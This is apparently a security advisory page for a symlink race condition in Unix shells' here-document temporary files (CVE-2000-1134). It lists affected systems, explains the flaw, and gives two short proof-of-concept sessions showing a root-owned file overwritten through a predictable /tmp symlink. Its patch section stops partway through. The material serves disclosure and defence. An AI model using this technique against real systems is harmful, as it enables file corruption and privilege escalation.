BID:2006

Unix Shell Redirection Race Condition Vulnerability

Info

Unix Shell Redirection Race Condition Vulnerability

Bugtraq ID:	2006
Class:	Race Condition Error
CVE:	CVE-2000-1134
Remote:	No
Local:	Yes
Published:	Jan 02 2000 12:00AM
Updated:	Jul 11 2009 03:56AM
Credit:	This issue for bash and ksh was discovered and posted to BugTraq by Paul Szabo <[email protected]>. The tcsh variation was posted to BugTraq by proton <[email protected]>. This vulnerability was originally discovered by Gordon Irlam.
Vulnerable:	Wirex Immunix OS 6.2 tcsh tcsh 6.9 .00 tcsh tcsh 6.8 .00 tcsh tcsh 6.7.2 SuSE Linux 7.0 Sun Solaris 2.5.1 _x86 Sun Solaris 2.5.1 Sun Solaris 8_x86 Sun Solaris 8_sparc Sun Solaris 7.0_x86 Sun Solaris 7.0 Sun Solaris 2.6_x86 Sun Solaris 2.6 Sun Solaris 2.5_x86 Sun Solaris 2.5 Sun Cobalt RaQ4 RAID 3100R Sun Cobalt RaQ4 Japanese RAID 3100R-ja Sun Cobalt RaQ4 3001R Sun Cobalt RaQ XTR Japanese 3500R-ja Sun Cobalt RaQ XTR 3500R Sun Cobalt RaQ XTR Sun Cobalt RaQ 4 Sun Cobalt Qube3 w/Caching 4010WG Sun Cobalt Qube3 w/ Caching and RAID 4100WG Sun Cobalt Qube3 Japanese w/Caching 4010WGJ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ Sun Cobalt Qube3 Japanese 4000WGJ Sun Cobalt Qube3 4000WG Sun Cobalt Qube 3 SGI IRIX 6.5.13 m SGI IRIX 6.5.13 f SGI IRIX 6.5.13 SGI IRIX 6.5.12 m SGI IRIX 6.5.12 f SGI IRIX 6.5.12 SGI IRIX 6.5.11 m SGI IRIX 6.5.11 f SGI IRIX 6.5.11 SGI IRIX 6.5.10 m SGI IRIX 6.5.10 f SGI IRIX 6.5.10 SGI IRIX 6.5.9 SGI IRIX 6.5.8 SGI IRIX 6.5.7 SGI IRIX 6.5.6 SGI IRIX 6.5.5 SGI IRIX 6.5.4 SGI IRIX 6.5.3 SGI IRIX 6.5.2 SGI IRIX 6.5.1 SGI IRIX 6.5 SCO Open Server 5.0.6 a SCO Open Server 5.0.6 SCO Open Server 5.0.5 SCO Open Server 5.0.4 SCO Open Server 5.0.3 SCO Open Server 5.0.2 SCO Open Server 5.0.1 SCO Open Server 5.0 SCO eServer 2.3 SCO eDesktop 2.4 Redhat Linux 6.2 E sparc Redhat Linux 6.2 E i386 Redhat Linux 6.2 E alpha Redhat Linux 6.2 sparc Redhat Linux 6.2 i386 Redhat Linux 6.2 alpha Redhat Linux 6.1 sparc Redhat Linux 6.1 i386 Redhat Linux 6.1 alpha Redhat Linux 6.0 sparc Redhat Linux 6.0 alpha Redhat Linux 6.0 Redhat Linux 5.2 sparc Redhat Linux 5.2 i386 Redhat Linux 5.2 alpha Redhat bash-1.14.7-22.i386.rpm + Redhat Linux 6.2 Redhat bash-1.14.7-16.i386.rpm + Redhat Linux 6.0 Redhat bash-1.14.7-13.i386.rpm + Redhat Linux 5.2 Netscape Communicator 6.01a - Sun Solaris 8_sparc - Sun Solaris 7.0 Mandriva Linux Mandrake 7.2 Mandriva Linux Mandrake 7.1 Mandriva Linux Mandrake 7.0 Mandriva Linux Mandrake 6.1 Mandriva Linux Mandrake 6.0 HP HP-UX 11.11 HP HP-UX 11.0 4 HP HP-UX 11.0 HP HP-UX 10.20 HP HP-UX 9.0 FreeBSD FreeBSD 5.0 FreeBSD FreeBSD 4.2 FreeBSD FreeBSD 3.5.1 Digital (Compaq) TRU64/DIGITAL UNIX 5.0 Compaq Tru64 5.1 a Compaq Tru64 5.1 Compaq Tru64 5.0 a Compaq Tru64 5.0 Compaq Tru64 4.0 g Compaq Tru64 4.0 f Compaq Tru64 4.0 d Caldera OpenLinux Desktop 2.3 Apple Mac OS X 10.0.4 Apple Mac OS X 10.0.3 Apple Mac OS X 10.0.2 Apple Mac OS X 10.0.1 Apple Mac OS X 10.0

Not Vulnerable:	Sun Solaris 8_sparc SGI IRIX 6.5.14 m SGI IRIX 6.5.14 f SGI IRIX 6.5.14 IBM AIX 4.3.3 HP HP-UX 11.0 Apple Mac OS X 10.1

Discussion

Unix Shell Redirection Race Condition Vulnerability

bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.

A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.

Scripts and command line operations using << as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists.

This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.

ksh is reportedly not vulnerable for IBM AIX systems.

Exploit / POC

Unix Shell Redirection Race Condition Vulnerability

This example was contributed by Paul Szabo <[email protected]> :

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

This example was submitted by proton <[email protected]> in an October 29th, 2001 BugTraq posting:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

Zenith Parsec <[email protected]> submitted an exploit for bash on Linux systems.

/data/vulnerabilities/exploits/bashack.c
/data/vulnerabilities/exploits/

Solution / Fix

Unix Shell Redirection Race Condition Vulnerability

Solution:
HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.

Sun has released an alert containing fixes to address this issue.

Sun has also released fixes for RaQ4, Qube3 and RaQXTR.

Various upgrades and patches have been made available:

Sun Cobalt RaQ4 Japanese RAID 3100R-ja